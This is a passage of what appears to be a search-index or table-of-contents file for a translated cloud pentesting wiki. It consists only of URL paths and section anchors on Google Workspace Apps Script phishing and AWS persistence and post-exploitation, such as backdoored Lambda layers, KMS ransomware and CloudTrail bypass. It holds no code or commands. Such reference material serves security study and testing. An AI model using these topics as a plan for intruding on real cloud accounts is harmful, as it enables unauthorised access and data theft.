з-app-script","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#leak-token","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Створити-тригер","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Спільний-доступ","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Зловживання-документами-спільно-надісланими-мені","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Копіювання-замість-спільного-доступу","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Спільний-доступ-як-веб-додаток","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Тестування","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#app-script-як-постійний-доступ","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Обхід-неперевіреного-запиту-спільного-документа","pentesting-cloud/aws-security/index.html#aws-pentesting","pentesting-cloud/aws-security/index.html#Основна-інформація","pentesting-cloud/aws-security/index.html#Лабораторії-для-навчання","pentesting-cloud/aws-security/index.html#Методологія-aws-pentesterred-team","pentesting-cloud/aws-security/index.html#Базова-енумерація","pentesting-cloud/aws-security/index.html#ssrf","pentesting-cloud/aws-security/index.html#whoami","pentesting-cloud/aws-security/index.html#org-enumeration","pentesting-cloud/aws-security/index.html#iam-enumeration","pentesting-cloud/aws-security/index.html#services-enumeration-post-exploitation--persistence","pentesting-cloud/aws-security/index.html#privilege-escalation","pentesting-cloud/aws-security/index.html#publicly-exposed-services","pentesting-cloud/aws-security/index.html#compromising-the-organization","pentesting-cloud/aws-security/index.html#from-the-rootmanagement-account","pentesting-cloud/aws-security/index.html#automated-tools","pentesting-cloud/aws-security/index.html#recon","pentesting-cloud/aws-security/index.html#privesc--exploiting","pentesting-cloud/aws-security/index.html#Аудит","pentesting-cloud/aws-security/index.html#Постійний-аудит","pentesting-cloud/aws-security/index.html#debug-Захоплення-запитів-aws-cli","pentesting-cloud/aws-security/index.html#Посилання","pentesting-cloud/aws-security/aws-basic-information/index.html#aws---Основна-інформація","pentesting-cloud/aws-security/aws-basic-information/index.html#Ієрархія-організації","pentesting-cloud/aws-security/aws-basic-information/index.html#Облікові-записи","pentesting-cloud/aws-security/aws-basic-information/index.html#Організаційні-одиниці","pentesting-cloud/aws-security/aws-basic-information/index.html#service-control-policy-scp","pentesting-cloud/aws-security/aws-basic-information/index.html#resource-control-policy-rcp","pentesting-cloud/aws-security/aws-basic-information/index.html#arn","pentesting-cloud/aws-security/aws-basic-information/index.html#iam---Управління-ідентифікацією-та-доступом","pentesting-cloud/aws-security/aws-basic-information/index.html#Кореневий-користувач-облікового-запису-aws","pentesting-cloud/aws-security/aws-basic-information/index.html#Користувачі-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#mfa---Багатофакторна-аутентифікація","pentesting-cloud/aws-security/aws-basic-information/index.html#Групи-користувачів-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#Ролі-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#Тимчасові-облікові-дані-в-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#Політики","pentesting-cloud/aws-security/aws-basic-information/index.html#Межі-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#Політики-сесії","pentesting-cloud/aws-security/aws-basic-information/index.html#Федерація-ідентичності","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-identity-center","pentesting-cloud/aws-security/aws-basic-information/index.html#Довірчі-відносини-та-ролі-між-обліковими-записами","pentesting-cloud/aws-security/aws-basic-information/index.html#aws-simple-ad","pentesting-cloud/aws-security/aws-basic-information/index.html#Інші-варіанти-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#Префікси-id-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#Рекомендовані-дозволи-для-аудиту-облікових-записів","pentesting-cloud/aws-security/aws-basic-information/index.html#Різне","pentesting-cloud/aws-security/aws-basic-information/index.html#Аутентифікація-cli","pentesting-cloud/aws-security/aws-basic-information/index.html#Посилання","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#aws---Зловживання-федерацією","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#saml","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#oidc---Зловживання-github-actions","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#the-workflow-should-only-trigger-on-pull-requests-to-the-main-branch","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#required-to-get-the-id-token-that-will-be-used-for-oidc","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#crate-an-eks-cluster-10min","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#create-an-identity-provider-for-an-eks-cluster","pentesting-cloud/aws-security/aws-permissions-for-a-pentest.html#aws---Дозволи-для-пентесту","pentesting-cloud/aws-security/aws-persistence/index.html#aws---Постійнiсть","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#aws---api-gateway-persistence","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#api-gateway","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#resource-policy","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#modify-lambda-authorizers","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#iam-permissions","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#api-keys","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#aws---cognito-persistence","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#cognito","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#user-persistence","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#cognito-idpsetriskconfiguration","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#aws---dynamodb-persistence","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#dynamodb","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#Тригери-dynamodb-з-бекдором-lambda","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#dynamodb-як-c2-канал","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#aws---ec2-persistence","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#ec2","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#Відстеження-зєднань-групи-безпеки","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#ec2-lifecycle-manager","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#Заплановані-екземпляри","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#Запит-на-флот-spot","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#Задні-двері-в-екземплярах","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#Конфігурація-запуску-з-задніми-дверима","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#vpn","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#vpc-peering","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#aws---ecr-persistence","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#ecr","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#Схований-docker-образ-з-шкідливим-кодом","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#Політика-репозиторію","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#Політика-реєстру-та-крос-акаунтне-реплікація","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#aws---ecs-persistence","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#ecs","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#Схована-періодична-задача-ecs","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#backdoor-container-in-existing-ecs-task-definition","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#undocumented-ecs-service","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#aws---elastic-beanstalk-persistence","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#persistence-in-instance","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#backdoor-in-version","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#new-backdoored-version","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#abusing-custom-resource-lifecycle-hooks","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#aws---efs-persistence","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#efs","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#Змінити-політику-ресурсу--групи-безпеки","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#Створити-точку-доступу","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#aws---iam-persistence","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#iam","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#Загальна-iam-Постійнiсть","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#Політики-довіри-до-бекдорів-ролей","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#Політика-бекдору-Версія","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#Бекдор--Створити-постачальника-ідентичності","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#aws---kms-persistence","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#kms","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#Надання-доступу-через-політики-kms","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#Вічний-грант","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#aws---lambda-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#lambda","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#lambda-layer-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#lambda-extension-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#via-resource-policies","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#versions-aliases--weights","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#version-backdoor--api-gateway","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#cronevent-actuator","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#aws---Зловживання-розширеннями-lambda","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#Розширення-lambda","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#Зовнішнє-розширення-для-збереження-крадіжки-запитів-та-модифікації-запитів","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#Посилання","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#aws---lambda-layers-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#lambda-layers","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#python-load-path","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#Завантажені-бібліотеки","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#Задній-доступ-до-lambda-layer","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#Зовнішні-шари","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#aws---lightsail-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#lightsail","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#Завантаження-ssh-ключів-інстансів-та-паролів-до-БД","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#Задні-двері-в-інстансах","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#dns-постійність","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#aws---rds-persistence","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#rds","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#Зробити-екземпляр-загальнодоступним-rdsmodifydbinstance","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#Створити-адміністратора-користувача-в-базі-даних","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#Зробити-знімок-публічним","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#aws---s3-persistence","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#s3","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#kms-client-side-encryption","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#using-s3-acls","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#aws---sns-persistence","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#sns","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#persistence","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#Створити-підписників","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#aws---secrets-manager-persistence","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#secrets-manager","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#Через-політики-ресурсів","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#Через-secrets-rotate-lambda","pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.html#aws---sqs-persistence","pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.html#sqs","pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.html#Використання-політики-ресурсів","pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.html#aws---ssm-perssitence","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#aws---Збереження-функцій-кроків","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#Функції-кроків","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#Задня-дверка-функції-кроків","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#Задні-дверки-псевдонімів","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#aws---sts-persistence","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#sts","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#Токен-ролі","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#Жонглювання-ролями","pentesting-cloud/aws-security/aws-post-exploitation/index.html#aws---Постексплуатація","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#aws---api-gateway-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#api-gateway","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#Доступ-до-неекспонованих-api","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#Обхід-пропуску-тіла-запиту","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#usage-plans-dos","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayupdategatewayresponse-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayupdatestage-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayputmethodresponse-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayupdaterestapi-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewaycreateapikey-apigatewayupdateapikey-apigatewaycreateusageplan-apigatewaycreateusageplankey","pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.html#aws---cloudfront-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.html#cloudfront","pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.html#man-in-the-middle","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#aws---codebuild-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuild","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#Перевірка-секретів","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#Зловживання-доступом-до-репозиторію-codebuild","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#Витікання-токенів-доступу-з-aws-codebuild","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuilddeleteproject","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuildtagresource--codebuilduntagresource","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuilddeletesourcecredentials","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#aws-codebuild---token-leakage","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#Відновлення-токенів-налаштованих-у-githubbitbucket","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#via-docker-image","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#via-insecuressl","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#via-http-protocol","pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.html#aws---control-tower-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.html#control-tower","pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.html#Увімкнення--Вимкнення-контролів","pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.html#aws---dlm-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.html#data-lifecycle-manger-dlm","pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.html#ec2describevolumes-dlmcreatelifecyclepolicy","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#aws---dynamodb-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodb","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbbatchgetitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbgetitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbquery","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbscan","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbpartiqlselect","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbexporttabletopointintimedynamodbupdatecontinuousbackups","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbcreatetable-dynamodbrestoretablefrombackup-dynamodbcreatebackup","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbputitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbupdateitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbdeletetable","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbdeletebackup","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbstreamspecification-dynamodbupdatetable-dynamodbdescribestream-dynamodbgetsharditerator-dynamodbgetrecords","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#aws---ec2-ebs-ssm--vpc-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ec2--vpc","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#Зловмисне-дзеркало-vpc----ec2describeinstances-ec2runinstances-ec2createsecuritygroup-ec2authorizesecuritygroupingress-ec2createtrafficmirrortarget-ec2createtrafficmirrorsession-ec2createtrafficmirrorfilter-ec2createtrafficmirrorfilterrule","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#Копіювати-працюючий-інстанс","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ebs-snapshot-dump","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#data-exfiltration","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#open-security-group","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#privesc-to-ecs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#remove-vpc-flow-logs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ssm-port-forwarding","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#share-ami","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#Пошук-чутливої-інформації-в-публічних-та-приватних-ami","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#Поділитися-знімком-ebs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ebs-ransomware-poc","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#aws---ebs-snapshot-dump","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#Перевірка-знімка-локально","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#Перевірка-знімка-в-aws","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#Перевірка-знімка-в-aws-використовуючи-cli","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#shadow-copy","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#references","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.html#aws---malicious-vpc-mirror","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#aws---ecr-Постексплуатація","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#ecr","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#Увійти-Завантажити-та-Відправити","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#ecrputlifecyclepolicy--ecrdeleterepository--ecr-publicdeleterepository--ecrbatchdeleteimage--ecr-publicbatchdeleteimage","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#aws---ecs-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#ecs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#host-iam-roles","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#privesc-to-node-to-steal-other-containers-creds--secrets","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#Вкрасти-чутливу-інформацію-з-контейнерів-ecr","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#aws---efs-Постексплуатація","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#efs","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemdeletemounttarget","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemdeletefilesystem","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemupdatefilesystem","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemcreateaccesspoint-та-elasticfilesystemdeleteaccesspoint","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#aws---eks-Постексплуатація","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#eks","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#Перерахунок-кластера-з-консолі-aws","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#Підключення-до-aws-kubernetes-Кластера","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#Від-aws-до-kubernetes","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#Від-kubernetes-до-aws","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#ОТРИМАТИ-api-server-endpoint-з-jwt-Токена","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#Обхід-cloudtrail","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#Вимагач-eks","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#aws---elastic-beanstalk-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkdeleteapplicationversion","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkterminateenvironment","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkdeleteapplication","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkswapenvironmentcnames","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkaddtags-elasticbeanstalkremovetags","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#aws---iam-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#iam","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#Проблема-заплутаного-заступника","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#Несподівані-довіри","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#references","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#aws---kms-Постексплуатація","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#kms","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#ШифруванняДешифрування-інформації","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#kms-ransomware","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#Загальний-kms-ransomware","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#Знищити-ключі","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#aws---lambda-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#lambda","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#Вкрасти-http-запити-інших-користувачів-до-lambda","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#Вкрасти-http-запити-інших-користувачів-до-lambda-та-запити-розширень","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#aws---Вкрасти-запити-lambda","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#Потік-lambda","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#Вкрадання-запитів-lambda","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#Кроки-атаки","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#Посилання","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#aws---lightsail-post-exploitation","pentes